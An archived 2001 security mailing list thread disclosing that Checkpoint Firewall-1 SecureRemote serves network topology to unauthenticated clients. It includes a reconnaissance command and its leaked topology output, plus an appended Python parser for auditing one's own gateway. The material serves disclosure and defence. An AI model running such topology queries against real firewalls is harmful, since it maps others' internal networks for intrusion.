Vulnerability Development mailing list archives

RE: Firewall-1 Information leak


From: "Jim Becher" <jim () becher net>
Date: Tue, 17 Jul 2001 22:31:49 -0500

As long as we are sharing information leakage stuff for Firewall-1...

I wrote something back in 1998 (I think) that would retrieve the interfaces
off of a Firewall-1, and write them to a file called ints.<IP address>.  I
have updated for v4.1.  I believe it will retrieve all the interfaces even
if topology downloads are restricted to authenticated requests.

If any part of the code is well-written, that's the part I ripped from
someone else's code.  If any part of the code sucks, that's mine.  ;)

Anyway, the code is located: www.becher.net/~jim/getints.c.


-bech

-----Original Message-----
From: Haroon Meer [mailto:haroon () sensepost com]
Sent: Tuesday, July 17, 2001 8:25 PM
To: vuln-dev () securityfocus com
Subject: Firewall-1 Information leak



Hi.

Checkpoint Firewall-1 makes use of a piece of software called SecureRemote
to create encrypted sessions between users and FW-1 modules. Before remote
users are able to communicate with internal hosts, a network topology of
the protected network is downloaded to the client. While newer versions of
the FW-1 software have the ability to restrict these downloads to only
authenticated sessions, the default setting allows unauthenticated
requests to be honoured. This gives a potential attacker a wealth of
information including IP addresses, network masks (and even friendly
descriptions).

The attached file will connect to the firewall, and download the
topology (if SecureRemote is running)
(it is a tiny perl file, which needs only Socket, so avoids the hassle of
having to install the SecureRemote client <or booting windows> to test a
firewall-1)

--snip--
SensePost# perl sr.pl firewall.victim.com
Testing  on port 256
        :val (
                :reply (
                        : (-SensePost-dotcom-.hal9000-19.3.167.186
                                :type (gateway)
                                :is_fwz (true)
                                :is_isakmp (true)
                                :certificates ()
                                :uencapport (2746)
                                :fwver (4.1)
                                :ipaddr (19.3.167.186)
                                :ipmask (255.255.255.255)
                                :resolve_multiple_interfaces ()
                                :ifaddrs (
                                        : (16.3.167.186)
                                        : (12.20.240.1)
                                        : (16.3.170.1)
                                        : (29.203.37.97)
                                )
                                :firewall (installed)
                                :location (external)
                                :keyloc (remote)
                                :userc_crypt_ver (1)
                                :keymanager (
                                        :type (refobj)
                                        :refname ("#_-SensePost-dotcom-")

)                               :name
                                (-SensePost-dotcom-Neo16.3.167.189)
                                                :type (gateway)
                                                :ipaddr (172.29.0.1)
                                                :ipmask (255.255.255.255)
                                        )

--snip--

Haroon Meer
+27 837866637
haroon () sensepost com
http://www.sensepost.com


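The reply printed above is a nested `:name (value)` structure, which is easy to read by eye for one gateway but tedious to audit once a topology contains many objects. The following is an added example, written for this archive page and not code from either post, from Jim Becher's getints.c, or from Check Point: a small parser for that textual format plus helpers that list every address a gateway discloses, so that an administrator can feed a reply captured from their own gateway and confirm what is exposed before and after restricting topology downloads to authenticated sessions. The sample reply embedded below is constructed to mirror the shape shown in the post, using RFC 5737 documentation addresses and made-up object names; nothing in it is a real host.

```python
import ipaddress
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Tokens: a double-quoted string, one of the punctuation characters ( ) :,
# or a bare atom (object names may contain '-', '.', '#', '_' as in the post).
TOKEN_RE = re.compile(r'"[^"]*"|[():]|[^\s():"]+')


@dataclass
class Node:
    """One ':name (...)' entry. 'values' holds bare scalars found inside the
    parentheses before any nested entries; 'children' holds nested entries."""
    name: Optional[str]
    values: List[str] = field(default_factory=list)
    children: List["Node"] = field(default_factory=list)


def tokenize(text: str) -> List[str]:
    return TOKEN_RE.findall(text)


def _expect(tokens: List[str], pos: int, want: str) -> int:
    if pos >= len(tokens) or tokens[pos] != want:
        got = tokens[pos] if pos < len(tokens) else "<end of input>"
        raise ValueError(f"expected {want!r} at token {pos}, got {got!r}")
    return pos + 1


def _parse_entries(tokens: List[str], pos: int):
    """Parse consecutive ':name (body)' entries until a ')' or end of input."""
    entries = []
    while pos < len(tokens) and tokens[pos] == ":":
        pos += 1
        name = None
        if pos < len(tokens) and tokens[pos] not in ("(", ")", ":"):
            name = tokens[pos]          # ':ipaddr (...)' has a name, ': (...)' does not
            pos += 1
        pos = _expect(tokens, pos, "(")
        node = Node(name)
        while pos < len(tokens) and tokens[pos] not in (":", ")"):
            node.values.append(tokens[pos].strip('"'))   # scalar such as 192.0.2.1
            pos += 1
        node.children, pos = _parse_entries(tokens, pos)
        pos = _expect(tokens, pos, ")")
        entries.append(node)
    return entries, pos


def parse(text: str) -> List[Node]:
    """Parse a complete reply; a truncated or unbalanced capture raises ValueError."""
    tokens = tokenize(text)
    entries, pos = _parse_entries(tokens, 0)
    if pos != len(tokens):
        raise ValueError(f"unexpected token {tokens[pos]!r} at position {pos}")
    return entries


def _child(node: Node, name: str) -> Optional[Node]:
    return next((c for c in node.children if c.name == name), None)


def _first_value(node: Node, name: str) -> Optional[str]:
    c = _child(node, name)
    return c.values[0] if c and c.values else None


def network_objects(text: str) -> List[dict]:
    """Every entry carrying an ':ipaddr' is a network object; collect its details."""
    found = []

    def walk(node: Node) -> None:
        if _child(node, "ipaddr") is not None:
            ifaddrs = _child(node, "ifaddrs")
            found.append({
                "name": node.values[0] if node.values else node.name,
                "type": _first_value(node, "type"),
                "ipaddr": _first_value(node, "ipaddr"),
                "ipmask": _first_value(node, "ipmask"),
                "ifaddrs": [c.values[0] for c in ifaddrs.children if c.values] if ifaddrs else [],
            })
        for child in node.children:
            walk(child)

    for root in parse(text):
        walk(root)
    return found


def all_addresses(text: str) -> List[str]:
    """Deduplicated list of every address disclosed, sorted numerically."""
    addrs = set()
    for obj in network_objects(text):
        if obj["ipaddr"]:
            addrs.add(obj["ipaddr"])
        addrs.update(obj["ifaddrs"])
    return sorted(addrs, key=ipaddress.ip_address)


# RFC 1918 ranges listed explicitly; these are the internal addresses an
# unauthenticated topology download should never have revealed.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def internal_addresses(text: str) -> List[str]:
    return [a for a in all_addresses(text)
            if any(ipaddress.ip_address(a) in net for net in RFC1918)]


# Constructed sample reply (hypothetical names, RFC 5737 documentation addresses).
SAMPLE_REPLY = """\
:val (
        :reply (
                : (example-gw-192.0.2.1
                        :type (gateway)
                        :is_fwz (true)
                        :is_isakmp (true)
                        :certificates ()
                        :fwver (4.1)
                        :ipaddr (192.0.2.1)
                        :ipmask (255.255.255.255)
                        :ifaddrs (
                                : (192.0.2.1)
                                : (198.51.100.1)
                                : (10.0.0.1)
                        )
                        :firewall (installed)
                        :location (external)
                        :keymanager (
                                :type (refobj)
                                :refname ("#_example-gw")
                        )
                )
                : (example-gw-Neo-198.51.100.9
                        :type (gateway)
                        :ipaddr (172.29.0.1)
                        :ipmask (255.255.255.255)
                )
        )
)
"""

if __name__ == "__main__":
    for obj in network_objects(SAMPLE_REPLY):
        print(f"{obj['name']}: {obj['ipaddr']} interfaces={obj['ifaddrs']}")
    print("internal addresses exposed:", internal_addresses(SAMPLE_REPLY))
```

To audit a real gateway, paste the reply produced by a client (or by the post's sr.pl) into a file and pass its contents to `network_objects` or `internal_addresses`; an empty result after enabling authenticated-only topology downloads confirms the restriction took effect. Note that a capture cut off mid-reply, like the tail of the listing in the post, is unbalanced and makes `parse` raise rather than silently report a partial inventory.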